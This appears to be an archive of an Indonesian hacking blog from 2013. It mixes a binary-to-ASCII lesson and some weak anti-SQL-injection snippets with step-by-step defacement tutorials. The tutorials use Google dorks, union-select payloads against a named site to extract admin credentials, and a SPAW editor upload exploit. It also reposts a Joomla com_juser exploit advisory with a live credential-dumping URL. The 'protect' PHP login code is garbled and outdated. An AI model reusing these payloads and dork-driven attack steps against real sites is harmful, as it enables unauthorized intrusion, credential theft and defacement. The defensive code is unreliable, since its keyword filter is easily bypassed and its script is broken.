Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Senin, 15 Juli 2013

Patch SQL

BIASAKAN UNTUK MEMBACA !!

Sebelumnya mari kita liat pengertian mysql injection secara umum :
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Para pemula biasanya lebih senang mengexploitasi mysql v.5 dari pada v.4 . mysql v.5 support terhadap information_schema yang memudahkan attacker untuk melancarkan serangan injeksi. Bahkan dengan beberapa sql scanner tools para lamer dan scriptkiddies dengan begitu mudahnya dapat melakukan serangan – serangan.

Contoh Serangan SQL ., missalkan saya ambil contoh SQL V.5

Code:
http://localhost/cobain/injector/index.php?id=-4+union+select+1,@@version,3,4,5--

[Image: 6_zpsa23ad91b.jpg]

Pada kesempatan kali ini saya hanya akan mencoba melakukan pencegahan dengan predefined atau PHP Superglobal . $_SERVER['REQUEST_URI'] yang menangkap nilai pada URL.

buat file php baru dengan nama antisqli.php lalu masukkan script berikut.

Code:
<?php
if (strlen($_SERVER['REQUEST_URI']) > 255 || strpos($_SERVER['REQUEST_URI'], "concat") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "base64")) {
echo "Maaf Bro... Apa tuh? Mau Nakal Yah :p";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
}
?>

Setelah itu kita melakukan include pada index.php di dalam folder injector tadi.

Code:
<?php
    include 'library/config.php';
    include 'library/opendb.php';
    include 'antisqli.php';
    ?>

Di bagian paling atas tinggal tambahkan aja include ‘antisqli.php’;. Setelah itu buka link yang tadi kita sisipkan perintah SQL dan apa yang terjadi?
[Image: 7.jpg]

Keren kan? Oke kita lihat lagi antisqli.php – nya…

Code:
if (strlen($_SERVER['REQUEST_URI']) > 255 || strpos($_SERVER['REQUEST_URI'], "concat") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "base64"))

Jika variabel di URL lebih dari 255 atau (tanda || dibaca atau) ada kata “concat“, “union” dan “base64“.

Code:
echo "Maaf Bro... Apa tuh? Mau Nakal Yah ";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;

Maka akan muncul pesan “Maaf Bro… Apa tuh? Mau Nakal Yah ?
kemudian dilanjutkan dibawahnya.

Nah gak hanya cuman union / concat kan jika kita melakukan SQL Injection. Ada select, @@version dan lain – lain. Kan kalian yang lebih jago kalo soal beginian., Nantinya kalian tinggal tambahkan aja menjadi.

Code:
strpos($_SERVER['REQUEST_URI'], "concat")

Jangan lupa tanda || (atau) penggunaan stripos (case insensitive).

Code:
if (strlen($_SERVER['REQUEST_URI']) > 255 || stripos($_SERVER['REQUEST_URI'], "concat") || stripos($_SERVER['REQUEST_URI'], "union") || stripos($_SERVER['REQUEST_URI'], "base64")) {

Atau menggunakan preg_match:
Code:
<?php
$berbahaya = array("union", "concat", "base64");

$gabungsemua = implode("|",$berbahaya);
if((strlen($_SERVER['REQUEST_URI']) > 255) || (preg_match("/".$gabungsemua."/i",$_SERVER['REQUEST_URI']))){
echo "Maaf Bro... Apa tuh? Mau Nakal Yah";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
?>

Sekarang union,UNIon,unIoN dan variasi – variasi yang lain pasti gak akan berhasil…

cara deface website menggunakan SQL Injection Manual


hay Sobat gmn kabarmu :D (sok kenal banget :v wkwkkw )
kali ini ane akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Contoh : http://situsq.com/berita.php?id=14’

http://situsq.com/berita.php?id=’14

Apabila terlihat pesan error seperti ini :
You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…

dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR,

Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:

https://addons.mozilla.org/id/firefox/addon/hackbar/

[/quote]langsung saja ke TKP

yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=

Copas dork di atas ke google.com , setelah itu pilih target sobat
contoh :
http://www.zenfocus.com/partners.php?id=2
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

[/URL]

Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali

Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1–  no error
http://www.zenfocus.com/partners.php?id=2 order by 2–  no error
http://www.zenfocus.com/partners.php?id=2 order by 3–  no error
http://www.zenfocus.com/partners.php?id=2 order by 4–  no error
http://www.zenfocus.com/partners.php?id=2 order by 5–  no error
http://www.zenfocus.com/partners.php?id=2 order by 6–  no error
http://www.zenfocus.com/partners.php?id=2 order by 7–  error

[Image: bahan-post-2_zps4ff3bcc5.png]
eror table ke 7

Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–



Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–



Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda –

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–



Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”



dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()



setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok



sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Setelah itu tekan Execute
Dan hasilnya



Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—



tekan Execute

dan hasilnya

[URL=http://i1285.photobucket.com/albums/a594/Rizal_Sullivan_Chapellanoz_Sevenfoldisme/bahan-post-210_zps4ef6f79f.png[/IMG]

Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat sobat

NB : PESAN DARI ANE , INGAT berjuta-juta WEBSITE yang anda DEFACE tidak akan membuat anda menjadi HEBAT

SALAM CYBER DARI SAYA
we are Indonesian Security Down
expect us

Terimakasih
wassallam

Kamis, 11 Juli 2013

cara mengkonversi bilangan biner ke.html

Sebelumnya, Saya akan mencoba menjelaskan tentang apa itu itu Bilangan Biner/Binary?
Bilangan Biner adalah sistem bilangan yang menggunakan suatu bilangan dasar atau basis (Radix) tertentu. Untuk bilangan biner menggunakan basis 2, menggunakan 2 macam simbol bilangan berbentuk 2 digit angka yaitu angka 0 dan 1.
Untuk mengkorversi Bilangan Biner kedalam bentuk teks maka yang harus sobat lakukan adalah :

  • RUBAH BILANGAN BINER KE DESIMAL
Sobat pasti sudah pernah melihat kode biner, seperti di bawah inikan?
01001010101010100110101

Pertama-tama yang kita lakukan adalah mengubah bilangan biner yang hanya terdi dari angka 0 dan 1 tersebut kedalam bilangan desiman. Kemudian baru kita terjemahkan bilangan decimal terseebut dalam bentuk teks agar dapat kita baca.

SISTEM BINER:

Di sini adalah satu contoh sederhana dari bilangan biner:
1 0 1 0 1 0 1

Untuk mengubah bilangna biner tersebut kedalam angka, maka yang perlu sobat lakukan adalah mengalikan setiap bilangan tersebut dengan bilangan 2 berpangkat, jadinya seperti berikut :

1 0 1 0 1 0 1 = (1x64)+(0x32)+(1x16)+(0x8)+(1x4)+(0x2)+(1x1)

1 0 1 0 1 0 1 = 64 + 0 + 16 + 0 + 4 + 0 + 1

1 0 1 0 1 0 1 = 85

NB : Untuk memberi pangkat pada Bilangan 2, lakukan dengan dengan cara berurutan dan diakhiri dengan pangkat 0
Sekarang sebagai latihan cobalah ubah beberapa bilangan biner yang sobat buat sendiri kedalam bilangan disimal.


  • CARA MERUBAH BILANGAN BINER KE CODE ASCII
Untuk mempermudah mengubah bilangan biner yagn telah kita ubah menjadi bilangan decimal tadi ke dalam bentuk teks, maka kita harus memperhatikan table KODE ASCII berikut :


Setelah sobat mempelajari table kode ASCII diatas sekarang kita coba untuk mengubah bilangan biner kedalam bentuk teks.
Misalnya kita ambil contoh bilangan biner berikut :

0101011101010101010100110011001000110100

Untuk langkah pertama yang harus kita lakukan adalah kita pisahkan dulu bilangan biner di atas menjadi 8 digit seperti berikut :

01010111   01010101   01010011   00110010   00110100

Sekarang, kita ubah bilangan biner tersebut per 8 digit dengan cara menghitungnya seperti yang telah dijelaskan diatas.

Delapan Digit ke-1 :
01010111 = (0x128) + ( 1x64) + (0x32) + (1x16) + (0x8) + (1x4) + (1x2) + (1x1)
01010111 =      0       +      64    +      0    +     16    +    0     +     4    +     2    +   1
01010111 =     87

Delapan Digit ke-2 :
01010101 = (0x128) + ( 1x64) + (0x32) + (1x16) + (0x8) + (1x4) + (0x2) + (1x1)
01010101 =      0       +      64    +      0    +     16    +    0     +     4    +     0    +   1
01010101 =     85

Delapan Digit ke-3 :
01010011 = (0x128) + ( 1x64) + (0x32) + (1x16) + (0x8) + (0x4) + (1x2) + (1x1)
01010011 =      0       +      64    +      0    +     16    +    0     +     0    +     2    +   1
01010011 =     83

Delapan Digit ke-4 :
00110010 = (0x128) + ( 0x64) + (1x32) + (1x16) + (0x8) + (0x4) + (1x2) + (0x1)
00110010 =      0       +      0    +      32    +     16    +    0     +     0    +     2    +  0
00110010 =     50

Delapan Digit ke-5 :
00110100 = (0x128) + ( 0x64) + (1x32) + (1x16) + (0x8) + (1x4) + (0x2) + (0x1)
00110100 =      0       +      0     +      32    +    16    +    0     +     4    +     0    +   0
00110100 =     52

Jadi, hasil konversi Biner ke Decimal adalah :
01010111 =     87
01010101 =     85
01010011 =     83
00110010 =     50
00110100 =     52

Untuk mengetahui karakter apa yg di hasilkan dari bilangan biner diatas, maka kita harus melihat table kode ASCII.
01010111 =     87  = W
01010101 =     85  = U
01010011 =     83  = S
00110010 =     50  = 2
00110100 =     52  = 4

Rabu, 10 Juli 2013

Belajar hacking dari awal :)

(Pemula)Tutor Lengkap+Gambar Deface Spaw Upload Vulnerably Maaf sebelumnya buat para mimin dan momod
kalau saya repost
dari tutor http://hacker-newbie.org/showthread.php?...light=spaw
Kalau memang tidak berguna silahkan hapus

Menurut saya Threed ini sangat berguna untuk yang benar-benar
pemula seperti saya,,soalnya mengingat beberapa hari lalu ada yang post http://hacker-newbie.org/showthread.php?tid=12893 menanyakan dari mana memulai untuk deface,,disini akan dijelaskan dengan GAMBAR semoga berguna buat yang bener-bener pemula seperti saya

Oke mari dibahas

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”
Lihat gambar


[Image: 30j334i.jpg]

Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

Lihat gambar

[Image: 9u4wup.jpg]

setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

LIHAT GAMBAR

[Image: 2z4a0s3.jpg]
Spoiler Hide
[Image: zv3bjo.jpg]

Tekan Enter
Akan Terbuka Gambar Seperti INI
LIHAT TUTOR DALAM GAMBAR


[Image: 14jqof7.jpg]

Lanjut
lihat terus gambar tutor ada didalam gambar

[Image: 2m6of8l.jpg]

LANJUT
Spoiler Hide
[Image: 2076hw4.jpg]

Lanjut TUTOR ADA DI GAMBAR

[Image: 2884dbc.jpg]

LANJUT

[Image: 34y4ahe.jpg]

SELESAI
Semoga bisa dimengerti

KALAU GAMBAR KURANG JELAS DIREFRESH AJA ATAU BUKA SATU-SATU YAH

SUmber Hn..

Sabtu, 29 Juni 2013

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection



Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================

etfffffjtiiiiiiiiiiiiii;,;iitfffffffGGDDDDEW#K;.
if E###################################W######Wi
iE,K##########################################Wi
iDtW###########WEftt;;ittLGLEEEKW##############j
iKD#######WEDft, ;tDW###########f
iWW####Kfi. You Gay iLK########f
jW###WL ,L######Wt
iW#WL; .. D#####Wi
iWK, tLDDEEj, ;#####Wi
f#D .G#######Ei K####E,
L## iGDGi. D#########D. L####D.
L##i tWWWWWL iKE#########j i####G.
tW#i D#WWKEWj fDL#########L .E###L
iW#j ;K####W#K; ;WK######WGKf G#WWj
,E#D .GW#######j ;L######KGE, ,E##Wj
G#G .tE#######L ,Gj,D#####WD; GWDW#f
L#E ,GK#####KKj iE#E.,fDEKDj. ;DWjiWWi
.G#Wf ;DW###EED, jW###L . .fK#KLfWK;
,E##Wt ;fDKKf. W####Wf iK#######K;
iWWL#Ki ,W#####K, .f##########f
;W#;L#WELt, .ijjji. f##########Wi
iWW j#####WDj;,. iK##########E.
;KW,K#########WKDj ;, .i.E###########K,
,ED;W############K; .DK ;Et fWtW###########Wi ,
,EL,W#############f iWG t#f jWfW###########Wt,
,Et.E#############L j#L,L#i jWfW###########Wj
,Dj L#############EGDK##LL#f;iDWL############Wj
,EE.f######################################EEWi
,EKjf######################################jD#f
jWWE####### [LatinHackTeam] ##GDWj
,K#################################W######EfWj
fEDDEEEEDLLLjtiiiiiiiiiiiitjLLGEEKjK#####WD#G.



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

###################################################



Example:
http://localHost/path/
index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
DEMO LIVE:

http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"Ð’©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>

# milw0rm.com [2009-06-01]

Minggu, 23 Juni 2013


cuman mau mengingatkan
jangan sampe ke asyikan deface web orang lain sampe sampe security web kita gak di perhatikan
mungkin kalaw bug sql or apalah itu tidak ada di web kita
tapi bagaimana jika web 1 hostingan sama kita itu di serang dan melakukan jumping server
maka matilah web kita :-D dia bisa melihat user login mysql kita :-D
ada sedikit cara untuk melindungi nya login admin nya
1.menggunakan managemen protect web yang ada di cpanel pilih lah dir login admin nyalalu seting user & password nya
2.menggunakan ip khusus dalam arti hanya ip kita saja yang bisa masuk ke dir admin
cra nya dengan menggunakan .htaccess


AuthUserFile /dev/null
AuthGroupFile /dev/null
 
AuthName “Access Control”
AuthType Basic
 
order deny,allow
deny from all
 
#IP address to Whitelist
allow from xxx.xxx.xxx.xxx
yang xxx.xxx itu ip kita / yang sering kita gunakan
3. buat lah file dengan nama protext.php / apalah terserah
<?php 



session_start(); 


$admin_user_name = “nama”; 

$admin_password = “password”; 

//you can change the username and password by changing the above two strings 


if (!isset($HTTP_SESSION_VARS['user'])) { 



if(isset($HTTP_POST_VARS['u_name'])) 

$u_name = $HTTP_POST_VARS['u_name']; 



if(isset($HTTP_POST_VARS['u_password'])) 

$u_password = $HTTP_POST_VARS['u_password']; 



if(!isset($u_name)) { 

?> 

<HTML> 

<HEAD> 

<TITLE><?php echo $HTTP_SERVER_VARS['HTTP_HOST']; ?> : Authentication Required</TITLE> 

</HEAD> 

<BODY bgcolor=#ffffff> 

<table border=0 cellspacing=0 cellpadding=0 width=100%> 

<TR><TD> 

<font face=verdana size=2><B>(Access Restricted to Authorized Personnel)</b> </font></td> 

</tr></table> 

<P></P> 

<font face=verdana size=2> 

<center> 

<?php 

$form_to = “http://$HTTP_SERVER_VARS[HTTP_HOST]$HTTP_SERVER_VARS[PHP_SELF]“; 



if(isset($HTTP_SERVER_VARS["QUERY_STRING"])) 

$form_to = $form_to .”?”. $HTTP_SERVER_VARS["QUERY_STRING"]; 



?> 

<form method=post action=<?php echo $form_to; ?>> 

<table border=0 width=350> 

<TR> 

<TD><font face=verdana size=2><B>User Name</B></font></TD> 

<TD><font face=verdana size=2><input type=text name=u_name size=20></font></TD></TR> 

<TR> 

<TD><font face=verdana size=2><B>Password</B></font></TD> 

<TD><font face=verdana size=2><input type=password name=u_password size=20></font></TD> 

</TR> 

</table> 

<input type=submit value=Login></form> 

</center> 

</font> 

</BODY> 

</HTML> 



<?php 

exit; 


else { 



function login_error($host,$php_self) { 

echo “<HTML><HEAD> 

<TITLE>$host : Administration</TITLE> 

</HEAD><BODY bgcolor=#ffffff> 

<table border=0 cellspacing=0 cellpadding=0 width=100%> 

<TR><TD align=left> 

<font face=verdana size=2><B> You Need to log on to access this part of the site! </b> </font></td> 

</tr></table> 

<P></P> 

<font face=verdana size=2> 

<center>”; 



echo “Error: You are not authorized to access this part of the site! 

<B><a href=$php_self>Click here</a></b> to login again.<P> 

</center> 

</font> 

</BODY> 

</HTML>”; 

session_unregister(“adb_password”); 

session_unregister(“user”); 

exit; 




$user_checked_passed = false; 





if(isset($HTTP_SESSION_VARS['adb_password'])) { 



$adb_session_password = $HTTP_SESSION_VARS['adb_password']; 

$adb_session_user = $HTTP_SESSION_VARS['user']; 





if($admin_password != $adb_session_password) 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 

else { 

$user_checked_passed = true; 







if($user_checked_passed == false) { 



if(strlen($u_name)< 2) 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 



if(isset($admin_password)) { 



if($admin_password == $u_password) { 



session_register(“adb_password”); 

session_register(“user”); 



$adb_password = $admin_password; 

$user = $u_name; 


else { //password in-correct 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 



else { 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 




$page_location = $HTTP_SERVER_VARS['PHP_SELF']; 

if(isset($HTTP_SERVER_VARS["QUERY_STRING"])) 

$page_location = $page_location .”?”. $HTTP_SERVER_VARS["QUERY_STRING"]; 



header (“Location: “. $page_location); 




?>

4.tinggal masukan ke dir admin di index.php
cara nya include ‘protect.php’;

5.lalu protect.php nya kamu encrypt supaya tidak terbaca :-D

jika menggunakan semua nya berarti security web kamu ada 3 :-D
*1 ip protect jika tembus masih ada 2 lagi :-D
* 2 page password protect ( yang di cpanel ) jika tembus juga masih ada 1 lagi :-D
*3 password protect page jika masih tembus juga ya tinggal menu login admin nya aja hehhehe
tapi kemungkinan besar gak mungkin bisa tembus semua nya

Sumber : http://forum.indonesiansecuritydown.org/thread-1.html